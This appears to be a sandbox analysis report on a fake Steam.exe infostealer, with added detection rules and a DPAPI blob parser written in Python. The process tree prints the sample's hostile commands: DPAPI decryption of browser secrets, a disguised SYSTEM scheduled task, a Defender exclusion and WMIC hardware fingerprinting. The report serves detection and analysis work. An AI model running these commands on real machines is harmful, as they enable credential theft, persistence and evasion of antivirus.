Analysis

  • max time kernel
    4s
  • max time network
    10s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240221-en
  • resource tags

    arch:x64, arch:x86, image:win11-20240221-en, locale:en-us, os:windows11-21h2-x64, system
  • submitted
    07-04-2024 19:44

General

  • Target

    Steam.exe

  • Size

    154.5MB

  • MD5

    8a3861c725d108eb0c1a17fa43f0487a

  • SHA1

    e4b713028e43e0f99e4568aa3902384b52951ed2

  • SHA256

    0177dec5005ce11309a54c49bc6a36c97008751db890b7bdf6c9eba48815acef

  • SHA512

    db3765823fd8bea6e6b1c17b8144038586e5089b20c6ee70e517cb5c864ec874f82cf08696cebb48b148683de3f6bea93b65d26c58f166a7bb3defd49e5dd3ad

  • SSDEEP

    1572864:UCquurbtqKajQe7vqrTU4PrCsdCXrBngPE1cG7VOWe2IkBmUgq3Fd6iU3x6VCdbm:eDAgZi

Score
7/10

Malware Config

Signatures

  • Loads dropped DLL 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials, cookies and session tokens.

  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs
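The signatures listed above, expressed as detection logic: this is an added example (not part of the report and not Triage's own signature code), written in Python over process-creation events constructed from the command lines in the Processes tree below. The rule names, the threshold of three distinct WMIC hardware classes, and the IP-lookup hostnames other than api.ipify.org are my choices; the two ProtectedData::Unprotect command lines are cut short in the sample data because only the call itself matters to that rule.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record: what the sandbox tree shows per node."""
    pid: int
    parent_image: str
    image: str
    cmdline: str


# Constructed from the Processes tree in this report (PID, parent image,
# image, command line). The ProtectedData::Unprotect byte list is cut after
# its first bytes here; only the call itself matters to the rule.
UNPROTECT = ("powershell.exe Add-Type -AssemblyName System.Security; "
             "[System.Security.Cryptography.ProtectedData]::Unprotect("
             "[byte[]]@(1,0,0,0,208,140,157,223 ...), $null, 'CurrentUser')")
EVENTS = [
    ProcEvent(852, "cmd.exe", "curl.exe", "curl http://api.ipify.org/ --ssl-no-revoke"),
    ProcEvent(648, "cmd.exe", "tasklist.exe", "tasklist"),
    ProcEvent(2488, "cmd.exe", "powershell.exe", UNPROTECT),
    ProcEvent(4852, "cmd.exe", "powershell.exe", UNPROTECT),
    ProcEvent(2868, "cmd.exe", "WMIC.exe", "wmic diskdrive get serialnumber"),
    ProcEvent(5040, "cmd.exe", "reg.exe",
              r'reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f'),
    ProcEvent(3120, "cmd.exe", "schtasks.exe",
              r'schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo '
              r'C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM'),
    ProcEvent(2188, "cmd.exe", "WMIC.exe", "wmic bios get smbiosbiosversion"),
    ProcEvent(1412, "cmd.exe", "powershell.exe",
              r'powershell Add-MpPreference -ExclusionPath '
              r'"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"'),
    ProcEvent(4176, "cmd.exe", "WMIC.exe", "wmic baseboard get serialnumber"),
    ProcEvent(1228, "cmd.exe", "WMIC.exe", "wmic MemoryChip get /format:list"),
    ProcEvent(1872, "cmd.exe", "WMIC.exe", "wmic path win32_computersystemproduct get uuid"),
    ProcEvent(3116, "powershell.exe", "wininit.exe", r'"C:\Windows\system32\wininit.exe"'),
]

# api.ipify.org is the one seen in the report; the others are my additions.
IP_LOOKUP_HOSTS = ("api.ipify.org", "ifconfig.me", "icanhazip.com", "ipinfo.io")
WMIC_IDENTITY_CLASSES = ("diskdrive", "bios", "baseboard", "memorychip",
                         "win32_computersystemproduct")


def _is(e, image):
    return e.image.lower() == image


def _has(e, *needles):
    c = e.cmdline.lower()
    return all(n in c for n in needles)


def _any(e, *needles):
    c = e.cmdline.lower()
    return any(n in c for n in needles)


# Single-event rules, matched on the lower-cased command line.
RULES = {
    "external_ip_lookup":
        lambda e: _is(e, "curl.exe") and _any(e, *IP_LOOKUP_HOSTS),
    "dpapi_unprotect_in_cmdline":
        lambda e: _is(e, "powershell.exe") and _has(e, "protecteddata]::unprotect"),
    "schtasks_system_script_in_appdata":
        lambda e: _is(e, "schtasks.exe") and _has(e, "/create", "/ru system", "\\appdata\\")
        and _any(e, "cscript", "wscript", ".vbs", ".bat"),
    "run_key_deleted":
        lambda e: _is(e, "reg.exe") and _has(e, " delete ", "currentversion\\run"),
    "defender_exclusion_added":
        lambda e: _is(e, "powershell.exe") and _has(e, "add-mppreference", "-exclusionpath"),
    # wininit.exe is started by smss.exe at boot; any other parent is anomalous.
    "wininit_unusual_parent":
        lambda e: _is(e, "wininit.exe") and e.parent_image.lower() != "smss.exe",
}


def wmic_fingerprint_pids(events, min_classes=3):
    """Correlation rule: fire once when WMIC queried at least min_classes
    distinct hardware-identity classes; returns the PIDs involved, else []."""
    seen, pids = set(), []
    for e in events:
        if _is(e, "wmic.exe"):
            hit = {c for c in WMIC_IDENTITY_CLASSES if c in e.cmdline.lower()}
            if hit:
                seen |= hit
                pids.append(e.pid)
    return sorted(pids) if len(seen) >= min_classes else []


def evaluate(events):
    """Return {rule_name: sorted PIDs} for every rule that fired."""
    hits = {name: sorted(e.pid for e in events if pred(e)) for name, pred in RULES.items()}
    hits = {name: pids for name, pids in hits.items() if pids}
    wmic = wmic_fingerprint_pids(events)
    if wmic:
        hits["hardware_fingerprint_via_wmic"] = wmic
    return hits


if __name__ == "__main__":
    for name, pids in evaluate(EVENTS).items():
        print(f"{name}: PIDs {pids}")
```

Two rules go beyond the report's own signatures: wininit.exe is launched by smss.exe during boot, so a copy spawned under powershell.exe (PID 4796 to 3116 in the tree) has an unusual parent, and a task with /RU SYSTEM can only be created from an elevated process, so if PID 3120 succeeded the sample was running with administrative rights. The `cmd.exe /d /s /c "..."` wrapper on every child is the form Node's child_process.exec uses on Windows, which fits the dropped .tmp.node native module and the Chromium-style --type=gpu-process flags on the Steam.exe children.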

Processes

  • C:\Users\Admin\AppData\Local\Temp\Steam.exe
    "C:\Users\Admin\AppData\Local\Temp\Steam.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:4576
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4896
      • C:\Windows\system32\curl.exe
        curl http://api.ipify.org/ --ssl-no-revoke
        3⤵
        PID:852
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:344
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:648
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4760
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:4528
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,142,201,190,236,119,164,249,229,41,6,194,37,239,167,184,163,113,143,87,88,255,118,110,201,100,66,207,20,108,252,227,68,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,182,249,61,2,159,110,24,25,13,161,36,186,14,75,78,120,216,53,125,15,64,189,193,186,132,116,79,103,202,186,94,48,0,0,0,152,140,232,44,188,166,20,101,3,247,171,153,99,3,74,178,253,152,73,92,23,31,142,140,189,199,211,146,124,26,26,111,64,189,223,72,118,238,118,127,166,126,39,230,8,162,176,235,64,0,0,0,180,244,68,231,242,166,178,241,72,22,15,194,14,178,91,91,84,8,166,233,155,101,48,41,247,47,79,140,45,53,245,186,235,199,214,238,172,241,176,13,60,70,213,189,216,77,98,203,211,240,139,15,138,215,20,227,41,204,192,211,179,39,141,8), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      • Suspicious use of WriteProcessMemory
      PID:3524
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,142,201,190,236,119,164,249,229,41,6,194,37,239,167,184,163,113,143,87,88,255,118,110,201,100,66,207,20,108,252,227,68,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,182,249,61,2,159,110,24,25,13,161,36,186,14,75,78,120,216,53,125,15,64,189,193,186,132,116,79,103,202,186,94,48,0,0,0,152,140,232,44,188,166,20,101,3,247,171,153,99,3,74,178,253,152,73,92,23,31,142,140,189,199,211,146,124,26,26,111,64,189,223,72,118,238,118,127,166,126,39,230,8,162,176,235,64,0,0,0,180,244,68,231,242,166,178,241,72,22,15,194,14,178,91,91,84,8,166,233,155,101,48,41,247,47,79,140,45,53,245,186,235,199,214,238,172,241,176,13,60,70,213,189,216,77,98,203,211,240,139,15,138,215,20,227,41,204,192,211,179,39,141,8), $null, 'CurrentUser')
        3⤵
        PID:2488
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,134,57,53,184,109,103,87,41,96,93,54,175,83,254,108,1,199,63,183,145,59,67,77,142,131,41,66,140,251,225,30,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,50,139,195,109,157,54,95,31,122,27,243,129,91,106,56,19,120,167,108,199,123,190,180,44,26,193,243,188,5,249,100,159,48,0,0,0,79,190,164,90,47,210,54,200,237,40,110,74,250,111,141,178,90,89,142,131,113,94,149,123,17,190,228,107,254,66,96,184,159,117,236,86,51,7,28,128,111,234,232,223,185,23,255,90,64,0,0,0,60,144,165,167,84,157,208,17,93,60,160,32,92,249,63,246,132,77,226,246,5,218,17,205,23,195,165,110,254,55,95,129,234,6,241,102,134,123,200,151,222,54,233,191,21,50,221,233,126,250,119,218,52,59,70,62,8,46,61,164,64,24,209,159), $null, 'CurrentUser')"
      2⤵
      • An obfuscated cmd.exe command-line is typically used to evade detection.
      PID:3156
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,134,57,53,184,109,103,87,41,96,93,54,175,83,254,108,1,199,63,183,145,59,67,77,142,131,41,66,140,251,225,30,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,50,139,195,109,157,54,95,31,122,27,243,129,91,106,56,19,120,167,108,199,123,190,180,44,26,193,243,188,5,249,100,159,48,0,0,0,79,190,164,90,47,210,54,200,237,40,110,74,250,111,141,178,90,89,142,131,113,94,149,123,17,190,228,107,254,66,96,184,159,117,236,86,51,7,28,128,111,234,232,223,185,23,255,90,64,0,0,0,60,144,165,167,84,157,208,17,93,60,160,32,92,249,63,246,132,77,226,246,5,218,17,205,23,195,165,110,254,55,95,129,234,6,241,102,134,123,200,151,222,54,233,191,21,50,221,233,126,250,119,218,52,59,70,62,8,46,61,164,64,24,209,159), $null, 'CurrentUser')
        3⤵
        PID:4852
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      2⤵
      PID:4816
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic diskdrive get serialnumber
        3⤵
        PID:2868
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
      2⤵
      PID:2504
      • C:\Windows\system32\reg.exe
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
        3⤵
        PID:5040
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
      2⤵
      PID:1008
      • C:\Windows\system32\schtasks.exe
        schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
        3⤵
        • Creates scheduled task(s)
        PID:3120
    • C:\Users\Admin\AppData\Local\Temp\Steam.exe
      "C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1712 --field-trial-handle=1960,i,12471839113151150774,27583312757680621,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
      2⤵
      PID:1828
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      2⤵
      PID:3080
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic bios get smbiosbiosversion
        3⤵
        PID:2188
    • C:\Users\Admin\AppData\Local\Temp\Steam.exe
      "C:\Users\Admin\AppData\Local\Temp\Steam.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\Steam" --mojo-platform-channel-handle=1288 --field-trial-handle=1960,i,12471839113151150774,27583312757680621,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8
      2⤵
      PID:2736
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs""
      2⤵
      PID:3728
      • C:\Windows\system32\cscript.exe
        cscript //nologo "C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs"
        3⤵
        PID:3088
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Steam\CheckEpicGamesLauncher.bat" "
          4⤵
          PID:2252
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
            5⤵
            PID:1412
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      2⤵
      PID:1516
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic baseboard get serialnumber
        3⤵
        PID:4176
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      2⤵
      PID:664
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic MemoryChip get /format:list
        3⤵
        PID:1228
      • C:\Windows\system32\find.exe
        find /i "Speed"
        3⤵
        PID:4668
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      2⤵
      PID:2044
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic path win32_computersystemproduct get uuid
        3⤵
        PID:1872
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell wininit.exe"
      2⤵
      PID:1232
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powershell wininit.exe
        3⤵
        PID:4796
        • C:\Windows\system32\wininit.exe
          "C:\Windows\system32\wininit.exe"
          4⤵
          PID:3116
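What the two PowerShell lines above (PIDs 2488 and 4852) actually hand to Windows: each `[byte[]]@(...)` literal is a DPAPI CRYPTPROTECT blob, and `ProtectedData::Unprotect(..., 'CurrentUser')` asks the OS to decrypt it with the logged-on user's DPAPI master key, which is why a sample already running as that user can recover DPAPI-protected secrets without holding any key of its own. The parser below is an added example, not code from the report or from the sample. It walks the DPAPI blob layout as documented by public DPAPI research tooling (assumed here; the page does not state it) over the two byte lists copied verbatim from the command lines, and pulls out the fields an analyst needs: the master key GUID, the flags, the description string, and the cipher and hash selection.

```python
import re
import struct
import uuid

# Constructed input: the two ProtectedData::Unprotect command lines from the
# process tree above (PIDs 2488 and 4852), copied verbatim from the report.
CMDLINE_2488 = "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,142,201,190,236,119,164,249,229,41,6,194,37,239,167,184,163,113,143,87,88,255,118,110,201,100,66,207,20,108,252,227,68,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,117,182,249,61,2,159,110,24,25,13,161,36,186,14,75,78,120,216,53,125,15,64,189,193,186,132,116,79,103,202,186,94,48,0,0,0,152,140,232,44,188,166,20,101,3,247,171,153,99,3,74,178,253,152,73,92,23,31,142,140,189,199,211,146,124,26,26,111,64,189,223,72,118,238,118,127,166,126,39,230,8,162,176,235,64,0,0,0,180,244,68,231,242,166,178,241,72,22,15,194,14,178,91,91,84,8,166,233,155,101,48,41,247,47,79,140,45,53,245,186,235,199,214,238,172,241,176,13,60,70,213,189,216,77,98,203,211,240,139,15,138,215,20,227,41,204,192,211,179,39,141,8), $null, 'CurrentUser')"
CMDLINE_4852 = "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,1,230,209,96,183,3,147,71,187,153,213,196,88,17,142,74,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,184,134,57,53,184,109,103,87,41,96,93,54,175,83,254,108,1,199,63,183,145,59,67,77,142,131,41,66,140,251,225,30,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,50,139,195,109,157,54,95,31,122,27,243,129,91,106,56,19,120,167,108,199,123,190,180,44,26,193,243,188,5,249,100,159,48,0,0,0,79,190,164,90,47,210,54,200,237,40,110,74,250,111,141,178,90,89,142,131,113,94,149,123,17,190,228,107,254,66,96,184,159,117,236,86,51,7,28,128,111,234,232,223,185,23,255,90,64,0,0,0,60,144,165,167,84,157,208,17,93,60,160,32,92,249,63,246,132,77,226,246,5,218,17,205,23,195,165,110,254,55,95,129,234,6,241,102,134,123,200,151,222,54,233,191,21,50,221,233,126,250,119,218,52,59,70,62,8,46,61,164,64,24,209,159), $null, 'CurrentUser')"

# Provider GUID present in every CRYPTPROTECT blob. The field order below is the
# widely documented DPAPI blob layout; it is assumed here, not stated on the page.
DPAPI_PROVIDER_GUID = uuid.UUID("df9d8cd0-1501-11d1-8c7a-00c04fc297eb")
ALG_NAMES = {0x6603: "CALG_3DES", 0x660E: "CALG_AES_128", 0x6610: "CALG_AES_256",
             0x8004: "CALG_SHA1", 0x800C: "CALG_SHA_256", 0x800E: "CALG_SHA_512"}
CRYPTPROTECT_LOCAL_MACHINE = 0x4   # blob bound to the machine key, not a user's


def bytes_from_powershell_array(cmdline: str) -> bytes:
    """Recover the raw bytes of a [byte[]]@(d,d,d,...) literal in a command line."""
    m = re.search(r"\[byte\[\]\]@\(([\d,\s]+)\)", cmdline)
    if not m:
        raise ValueError("no [byte[]]@(...) literal found")
    return bytes(int(v) for v in m.group(1).split(","))


class _Cursor:
    """Sequential little-endian reader that refuses to run past the end."""
    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def take(self, n: int) -> bytes:
        if self.pos + n > len(self.data):
            raise ValueError("truncated DPAPI blob")
        chunk, self.pos = self.data[self.pos:self.pos + n], self.pos + n
        return chunk

    def u32(self) -> int:
        return struct.unpack("<I", self.take(4))[0]

    def guid(self) -> uuid.UUID:
        return uuid.UUID(bytes_le=self.take(16))  # Windows GUID byte order


def parse_dpapi_blob(blob: bytes) -> dict:
    """Split a CRYPTPROTECT blob into its header fields and payload parts."""
    c = _Cursor(blob)
    info = {"version": c.u32(), "provider_guid": c.guid()}
    if info["provider_guid"] != DPAPI_PROVIDER_GUID:
        raise ValueError("not a DPAPI blob: provider GUID mismatch")
    info["masterkey_version"] = c.u32()
    info["masterkey_guid"] = c.guid()     # names the master key file needed to decrypt
    info["flags"] = c.u32()
    info["local_machine"] = bool(info["flags"] & CRYPTPROTECT_LOCAL_MACHINE)
    info["description"] = c.take(c.u32()).decode("utf-16-le").rstrip("\x00")
    alg = c.u32()
    info["cipher"], info["cipher_bits"] = ALG_NAMES.get(alg, hex(alg)), c.u32()
    info["salt"] = c.take(c.u32())
    c.take(c.u32())                       # "strong" HMAC key field, empty in practice
    alg = c.u32()
    info["hash"], info["hash_bits"] = ALG_NAMES.get(alg, hex(alg)), c.u32()
    info["hmac_key"] = c.take(c.u32())
    info["ciphertext"] = c.take(c.u32())
    info["signature"] = c.take(c.u32())
    if c.pos != len(blob):
        raise ValueError(f"{len(blob) - c.pos} trailing bytes after signature")
    return info


def summarize(cmdline: str) -> dict:
    """Parse the blob embedded in one Unprotect command line."""
    blob = bytes_from_powershell_array(cmdline)
    info = parse_dpapi_blob(blob)
    info["blob_len"] = len(blob)
    return info


if __name__ == "__main__":
    for name, cmd in (("PID 2488", CMDLINE_2488), ("PID 4852", CMDLINE_4852)):
        s = summarize(cmd)
        print(f"{name}: {s['blob_len']} bytes, desc={s['description']!r}, "
              f"masterkey={s['masterkey_guid']}, flags={s['flags']:#x}, "
              f"{s['cipher']}/{s['hash']}, {len(s['ciphertext'])}-byte ciphertext")
```

Both blobs reference the same master key GUID, so one master key file under the user's %APPDATA%\Microsoft\Protect\<SID>\ directory is what an analyst would need to decrypt them offline, and the second carries the description string "Edge", consistent with the "Reads user/profile data of web browsers" signature above. Neither blob sets CRYPTPROTECT_LOCAL_MACHINE, so they only decrypt in that user's context, which is why the sample decrypts them on the victim host rather than exfiltrating them raw.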

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize
    3KB
    MD5
    f10a836b72e0bf0946a8e1cd5fadce2c
    SHA1
    586b63a56f0eb3e84be0cca2aa83a3ad66ad268e
    SHA256
    5e314ed17c2e2997a8ffde8d3d68a05004fb29659ad1a10e698f04462a9d69d5
    SHA512
    1ecfe04091c336147e372ea24defeeb0c965ad2a02f64e4c6f64edf25a1cf289b02456c782fd3a9a6f401f947fd07125c36c9bbcb5eff4ac11d2b99b5c3827fd
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize
    1KB
    MD5
    7a2b288b6516ace3c60a8b6718511f0a
    SHA1
    7783140c099db9de2dcc5d5fc4ac79105e41f707
    SHA256
    921c27cf4a64523fdcaa3f724a90a5f635da1f05541b7c6bcce9b5a892909ce9
    SHA512
    56d57c9c46be4fef39b6d1a0cc5b769eec05f42a08323b41c222096831be315009860d4bd3d7dc5833887845d11806cf2eef24ce7e24888c2c30777f6918974f
  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize
    1KB
    MD5
    14bb94c36d909375f4a2c1163c1780fb
    SHA1
    02ff6e3a0293fe7428499390adacc96862e17d91
    SHA256
    e291bdfc4667f621131172b199039aa4147404efa429ad54482073b4e46c391a
    SHA512
    9241b39e96e443a40e9cb59b5db5f8e5724203742ecdad77f147bb59360fdf7d198ad49c44682d707fe3ab77b5cd01b1d9c27cfc8e3900ea2a99fad9a26cb0b6
  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vzfzesfy.ged.ps1
    Filesize
    60B
    MD5
    d17fe0a3f47be24a6453e9ef58c94641
    SHA1
    6ab83620379fc69f80c0242105ddffd7d98d5d9d
    SHA256
    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
    SHA512
    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
  • C:\Users\Admin\AppData\Local\Temp\f1488582-d6b7-497c-9bf5-c48c7a80f6cf.tmp.node
    Filesize
    1.8MB
    MD5
    3072b68e3c226aff39e6782d025f25a8
    SHA1
    cf559196d74fa490ac8ce192db222c9f5c5a006a
    SHA256
    7fb52b781709b065c240b6b81394be6e72e53fe11d7c8e0f7b49dd417eb78a01
    SHA512
    61ebc72c20195e99244d95af1ab44fa06201a1aee2b5da04490fdc4312e8324a40b0e15a7b42fab5179753d767c1d08ae1a7a56ac71a6e100e63f83db849ee61
  • C:\Users\Admin\AppData\Roaming\Steam\CheckEpicGamesLauncher.bat
    Filesize
    1KB
    MD5
    79a5e87823b83ea148f718b5fe237ec9
    SHA1
    408431f7d062aef5017f2ce715b2da16a8585fa8
    SHA256
    0626a1ecba78a0d83bddf6fceb66ba490e5ba176516e496faec4c1b3e344e2a1
    SHA512
    2433d01f189a49a3155f46d494bc2a441faf0f29160d5709e92972d558afa22ac6bd71e089fbd7a19a39ca151f90b086d5cbb6e7f17f7460df35397cf73cf5a8
  • C:\Users\Admin\AppData\Roaming\Steam\RunBatHidden.vbs
    Filesize
    155B
    MD5
    849a5123f73771f6fe0e36056813e7cb
    SHA1
    ccf4436fccf38a27cabf2603e61557976dbe3b01
    SHA256
    e0388ef99c9337d7779c5cbca39cc51d558ca6aa2434f8d7e0794ae1cdb7c870
    SHA512
    1204530de2c24b8ce159ec95044b9cb065a8aab95143b73467ea67fc3756c08f9b782dc9934ab98cfdb27f33caa6f7157b7750763f78e5406c46533ec37f9ebd
  • memory/1412-94-0x000001C9B4AA0000-0x000001C9B4AB0000-memory.dmp
    Filesize
    64KB
  • memory/1412-93-0x00007FFEFB190000-0x00007FFEFBC52000-memory.dmp
    Filesize
    10.8MB
  • memory/1412-73-0x000001C9B4AA0000-0x000001C9B4AB0000-memory.dmp
    Filesize
    64KB
  • memory/1412-74-0x000001C9B4AA0000-0x000001C9B4AB0000-memory.dmp
    Filesize
    64KB
  • memory/2488-14-0x00000251CA150000-0x00000251CA172000-memory.dmp
    Filesize
    136KB
  • memory/2488-15-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp
    Filesize
    10.8MB
  • memory/2488-22-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp
    Filesize
    10.8MB
  • memory/2488-18-0x00000251CA210000-0x00000251CA260000-memory.dmp
    Filesize
    320KB
  • memory/2488-17-0x00000251B1BC0000-0x00000251B1BD0000-memory.dmp
    Filesize
    64KB
  • memory/2488-16-0x00000251B1BC0000-0x00000251B1BD0000-memory.dmp
    Filesize
    64KB
  • memory/4796-72-0x000001DC0CC40000-0x000001DC0CC50000-memory.dmp
    Filesize
    64KB
  • memory/4796-71-0x00007FFEFB190000-0x00007FFEFBC52000-memory.dmp
    Filesize
    10.8MB
  • memory/4796-80-0x000001DC0CC40000-0x000001DC0CC50000-memory.dmp
    Filesize
    64KB
  • memory/4852-40-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp
    Filesize
    10.8MB
  • memory/4852-36-0x000001F1912C0000-0x000001F1912D0000-memory.dmp
    Filesize
    64KB
  • memory/4852-37-0x000001F1912C0000-0x000001F1912D0000-memory.dmp
    Filesize
    64KB
  • memory/4852-35-0x000001F1912C0000-0x000001F1912D0000-memory.dmp
    Filesize
    64KB
  • memory/4852-33-0x00007FFEFC6A0000-0x00007FFEFD162000-memory.dmp
